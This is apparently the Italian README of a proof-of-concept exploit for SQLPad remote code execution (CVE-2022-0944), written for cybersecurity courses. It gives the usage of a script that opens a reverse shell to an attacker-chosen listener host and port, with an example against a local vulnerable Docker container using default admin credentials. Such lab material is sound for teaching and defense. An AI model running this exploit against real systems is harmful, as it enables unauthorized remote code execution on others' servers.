
Un exploit proof of concept per SQLPad RCE (CVE-2022-0944).
Un exploit proof of concept per SQLPad RCE (CVE-2022-0944)
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
Esempio:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
Questo repository contiene codice e strumenti destinati esclusivamente a scopi educativi, in particolare per l'uso in corsi di cybersecurity e ambienti di apprendimento. L'autore di questo codice non si assume alcuna responsabilità per eventuali conseguenze derivanti dall'uso, dall'uso improprio o dalla modifica di questo codice. Il codice è fornito "così com'è" senza alcuna garanzia, esplicita o implicita, incluse, a titolo esemplificativo, le garanzie implicite di commerciabilità o idoneità a uno scopo particolare.